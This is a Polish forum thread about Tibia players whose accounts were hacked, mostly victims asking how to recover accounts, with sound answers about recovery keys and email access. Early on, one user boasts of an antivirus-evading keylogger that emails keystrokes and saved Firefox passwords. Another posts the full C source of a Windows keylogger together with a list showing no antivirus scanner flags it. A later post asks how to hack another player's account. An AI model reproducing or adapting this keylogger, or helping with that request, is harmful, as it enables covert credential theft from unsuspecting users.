"Schakowali mnie, halp plx"-czyli co robić aby temu zapobiec

[fAYL]

Taka mała dygresja nt. keyloggerów. Nie zawsze warto wierzyć antywirom. :)
Wczoraj z nudów postanowiłem napisać sobie prostego KL (ukryte działanie; zbieranie wciśniętych klawiszy i wysyłanie ich co minutę mailem [firewall u mnie i 2 testerów milczał ;) ]; przesyłanie mailem pliku z zapisanymi hasłami w firefoksie).
W sumie pół dnia zabawy, a virustotal jakoś niezbyt dobrze się spisał. ;)

A VBA32 to jakiś mało znany anywir chyba, więc pewnie przypadkiem coś znalazł. :P

[Uther92]

A aj sobie napisałem takie małe proste ale niewykrywalne ścierwo. Ale nie wysyła logów
A-Squared
Found nothing
AntiVir
Found nothing
ArcaVir
Found nothing
Avast
Found nothing
AVG Antivirus
Found nothing
BitDefender
Found nothing
ClamAV
Found nothing
Dr.Web
Found nothing
F-Prot Antivirus
Found nothing
F-Secure Anti-Virus
Found nothing
Fortinet
Found nothing
Kaspersky Anti-Virus
Found nothing
NOD32
Found nothing
Norman Virus Control
Found nothing
Panda Antivirus
Found nothing
Rising Antivirus
Found nothing
VirusBuster
Found nothing
VBA32
Found nothing

Source:

Ukryty tekst:

#include <windows.h>
#include <iostream>

int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{

MSG messages;
MSG msgKomunikat;
msgKomunikat.message = WM_NULL;
while (msgKomunikat.message != WM_QUIT)
{
if (PeekMessage(&msgKomunikat, NULL, 0, 0, PM_REMOVE))
{
TranslateMessage (&msgKomunikat);
DispatchMessage (&msgKomunikat);
}
else
{
short character;
for(character=8;character<=222;character++)
{
if(GetAsyncKeyState(character)==-32767)
{
FILE *file;
if(file=fopen("pozdrawiam Uther .txt","a+"))
{
if((character>=39)&&(character<=64))
{
fputc(character,file);
fclose(file);
break;
}
else if((character>64)&&(character<91))
{
character+=32;
fputc(character,file);
fclose(file);
break;
}
else
{

switch(character)
{
case VK_SPACE:
fputc(' ',file);
fclose(file);
break;
case VK_SHIFT:
fputs("[SHIFT]",file);
fclose(file);
break;
case VK_RETURN:
fputs("\n[ENTER]",file);
fclose(file);
break;
case VK_BACK:
fputs("[BACKSPACE]",file);
fclose(file);
break;
case VK_TAB:
fputs("[TAB]",file);
fclose(file);
break;
case VK_CONTROL:
fputs("[ALT\\CTRL]",file);
fclose(file);
break;
case VK_DELETE:
fputs("[DEL]",file);
fclose(file);
break;
case VK_OEM_1:
fputs("[;",file);
fclose(file);
break;
case VK_OEM_2:
fputs("[/?]",file);
fclose(file);
break;
case VK_OEM_3:
fputs("[`~]",file);
fclose(file);
break;
case VK_OEM_4:
fputs("[ [{ ]",file);
fclose(file);
break;
case VK_OEM_5:
fputs("[\\|]",file);
fclose(file);
break;
case VK_OEM_6:
fputs("[ ]} ]",file);
fclose(file);
break;
case VK_OEM_7:
fputs("['\"]",file);
fclose(file);
break;
case VK_NUMPAD0:
fputc('0',file);
fclose(file);
break;
case VK_NUMPAD1:
fputc('1',file);
fclose(file);
break;
case VK_NUMPAD2:
fputc('2',file);
fclose(file);
break;
case VK_NUMPAD3:
fputc('3',file);
fclose(file);
break;
case VK_NUMPAD4:
fputc('4',file);
fclose(file);
break;
case VK_NUMPAD5:
fputc('5',file);
fclose(file);
break;
case VK_NUMPAD6:
fputc('6',file);
fclose(file);
break;
case VK_NUMPAD7:
fputc('7',file);
fclose(file);
break;
case VK_NUMPAD8:
fputc('8',file);
fclose(file);
break;
case VK_NUMPAD9:
fputc('9',file);
fclose(file);
break;
case VK_CAPITAL:
fputs("[CAPS LOCK]",file);
fclose(file);
break;
default:
fclose(file);
break;
}
}
}
}
}
}
}
return messages.wParam;
}

LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
switch (message)
{
case WM_DESTROY:
PostQuitMessage (0);
break;
default:
return DefWindowProc (hwnd, message, wParam, lParam);
}

return 0;
}

[Dawidurud]

poprostu super poradnik!! dzieki niemu odzyskalemn swoja postac

[Rafal727]

Mam pytanie!! Bardzo potrzebuje pomocy!!! Mam numer do konta, ale zapomnielem hasla i nie mam tez hasla do meila na tym koncie Czy moge cos zrobic zeby odzyskac te konto ??? Prosze o pomoc!!!

A zna ktos program ktorym odczytam haslo do tibi z kompa ???

[thierry]

Jeżeli schackowano nas na 70 +poziomie radze isć na dragon lair i pozbierac śmieci (steel shieldy,mace,kusze,p legi itp) średni loot bag to 4-5k

[cieju04]

Mam problem. Kiedyś jak byłem głupi nabrałem się i ściągnąłem plik z rzekomo zdjęciami z questu. Ale poprosiłem tą osobę i zrobiła tak, że mogłem spokojnie wykasować plik. Teraz mineło sporo czasu od tamtego incydentu. Dzis wchodze rano na tibie, patrze a w banku 0 gp. Tyle zostało z około 10k. Dziwne, że tylko to znikło, a nie np pancerz czy guardian shield. I moje pytanie jest takie, czy ta osoba od której ściągnąłem ten plik i zaraz po tym wykasowałem nadal może widzieć moje hasła itd?

[balamuta]

Mam pytanie bo ja tez miałem podobną sytuację że ściągałem notatnik z Emule pt"Password and account Tibia" nic tam niebylo i to skasowalem i teraz niewiem powiedzcie jak przeskanowac szybko tak jak wy to robicie i piszcie na forum

[Duch Niespokojny]

Cytuj:

Oryginalnie napisane przez Rafal727

Mam pytanie!! Bardzo potrzebuje pomocy!!! Mam numer do konta, ale zapomnielem hasla i nie mam tez hasla do meila na tym koncie Czy moge cos zrobic zeby odzyskac te konto ??? Prosze o pomoc!!!

Są trzy opcje:
a) odzyskać dostęp do konta e-mail,
b) użyć recovery key,
c) pożegnać się z kontem.

Cytuj:

Oryginalnie napisane przez cieju04

I moje pytanie jest takie, czy ta osoba od której ściągnąłem ten plik i zaraz po tym wykasowałem nadal może widzieć moje hasła itd?

Tak, samo wykasowanie pliku nic nie daje.

Cytuj:

Oryginalnie napisane przez balamuta

Mam pytanie bo ja tez miałem podobną sytuację że ściągałem notatnik z Emule pt"Password and account Tibia" nic tam niebylo i to skasowalem i teraz niewiem powiedzcie jak przeskanowac szybko tak jak wy to robicie i piszcie na forum

Jeżeli to był zwykły plik .txt, to nie widzę problemu...

[cieju04]

Mam znów problem. Zostałem zhackowany, zmienili mi hasło, ale później je odzyskałem i zmieniłem na swoje tylko, że haker zrobił to co ja i zgłosił account lost. Co mam zrobić? zna mój numer konta. Plx szybką odpowiedź Nie wiem co robić a mam PACC.

[Duch Niespokojny]

Cytuj:

Oryginalnie napisane przez cieju04

Mam znów problem. Zostałem zhackowany, zmienili mi hasło, ale później je odzyskałem i zmieniłem na swoje tylko, że haker zrobił to co ja i zgłosił account lost. Co mam zrobić? zna mój numer konta. Plx szybką odpowiedź Nie wiem co robić a mam PACC.

Jeżeli "hacker" nie ma dostępu do twojego konta e-mail, to co najwyżej będziesz dostawał maile z prośbą o potwierdzenie żądania przysłania nowego hasła, które możesz zwyczajnie zignorować. Jeśli nie masz dostępu do tego konta emailowego, możesz je zmienić używając recovery key.

[cieju04]

Cytuj:

Oryginalnie napisane przez Duch Niespokojny

Jeżeli "hacker" nie ma dostępu do twojego konta e-mail, to co najwyżej będziesz dostawał maile z prośbą o potwierdzenie żądania przysłania nowego hasła, które możesz zwyczajnie zignorować. Jeśli nie masz dostępu do tego konta emailowego, możesz je zmienić używając recovery key.

Dzięki stary, nawet nie wiesz jak mi pomogłeś. Wiedziałem, że w tym kraju są porządni ludzie. Jesteś jedną z nim. Już wszystko jest dobrze, sprawa zażegnana

Witam. Otóz mam wielki problem. Shackowali mnie. Odzyskałem konto dzień po
hacku. Dziwi mnie dlaczego hacker niezabrał ŻADNYCH, dosłownie ŻADNYCH itemów? Problem tkwi w tym, że hacker zarejestrował konto. Wpisał w pola jakieś bazgroły, i tu mam pytanie - czy przy rejestracji dostaje się recovery key? Nieposiadam Pacc, więc raczej nie.. tak myśle. Co mam zrobić? Z góry dzięki.

[Galeon]

@up: ojj jak nie byles zarejestrowany a on to zrobil to ma twoj rec key jezeli ty go nie masz to niestety ale nie pograsz zbyt dlugo jezeli hacker wykorzysta rec key, proste: jakby sie shackowal i zabral all rzeczy ale nie mial rec keya to zmieniasz haselko i grasz dalej... ale jak ma rec key a nic nie zabral to mozesz zbierac sobie kase i grac dalej ale w kazdej chwili moze wejsc ci na konto i ograbic postac dlatego pamietaj zawsze o rejestracji konta jezeli ci na nim zalezy...

[Duch Niespokojny]

Cytuj:

Oryginalnie napisane przez Gravers

Dziwi mnie dlaczego hacker niezabrał ŻADNYCH, dosłownie ŻADNYCH itemów? Problem tkwi w tym, że hacker zarejestrował konto. Wpisał w pola jakieś bazgroły, i tu mam pytanie - czy przy rejestracji dostaje się recovery key? Nieposiadam Pacc, więc raczej nie.. tak myśle. Co mam zrobić? Z góry dzięki.

Krótko: załóż nową postać (na innym koncie oczywiście) i przekaż jej wszystkie rzeczy póki jeszcze możesz, bo na tym koncie już sobie nie pograsz.

A jeśli zapłace 5 euro za nowego recovery key? Czy stary recovery key wygaśnie? Baardzo zależy mi na tym koncie. Wiem, że można zdobyć nowy recovery key.

[Kill_Bill]

wspaniały temat, użyłem praiwe wszystkich programów przez was poleconych, mam pytanie, czy jeśli będę używał 1 antyvir,1firewall,ad-aware i inne to sie nie beda ,,gryzły"?+hijack,regcleaner itp.

[Duch Niespokojny]

Cytuj:

Oryginalnie napisane przez Gravers

A jeśli zapłace 5 euro za nowego recovery key? Czy stary recovery key wygaśnie? Baardzo zależy mi na tym koncie. Wiem, że można zdobyć nowy recovery key.

Nie dostaniesz nowego recovery key, bo konto nie jest zarejestrowane na ciebie. Jeśli wciąż masz dostęp do konta, to możesz co prawda zmienić dane podane przy rejestracji, ale musiałbyś na to czekać miesiąc.

Witam. Prawdopodobnie mam keyloggera na kompie, uzylem programu hijackthis i i znalazlem go(przynajmniej tak mi sie wydaje) znalazlem cos takiego: orcToByloLatwe i jeszcze C:\Windows\services*****.
orca usunelem a ten services usunelem przy pomocy killboxa i teraz jak sprawdzam loga to mi pokazuje ze ten services nadal jest tylko ze teraz w
C:\!KillBox\services*****
i nie wiem czy on jeszcze dziala czy jest usuniety i czy jeszcze cos powinienem zrobic.
prosze o pomoc.

[Uther92]

Cytuj:

Oryginalnie napisane przez marek1234

Witam. Prawdopodobnie mam keyloggera na kompie, uzylem programu hijackthis i i znalazlem go(przynajmniej tak mi sie wydaje) znalazlem cos takiego: orcToByloLatwe i jeszcze C:\Windows\services*****.
orca usunelem a ten services usunelem przy pomocy killboxa i teraz jak sprawdzam loga to mi pokazuje ze ten services nadal jest tylko ze teraz w
C:\!KillBox\services*****
i nie wiem czy on jeszcze dziala czy jest usuniety i czy jeszcze cos powinienem zrobic.
prosze o pomoc.

To backup killbox'a...już nie powinien być groźny. Jak chcesz to usuń

[Konrad21]

Witam all mam pytanie jak sie tu robi wlasny post bo niewiem ?? aha i tak przy okazji mam prozbe wytlumaczcie mi dokladnie np znam rekowerkeya kolesia w tibi jak go zhakowac prosze pomoc pozdro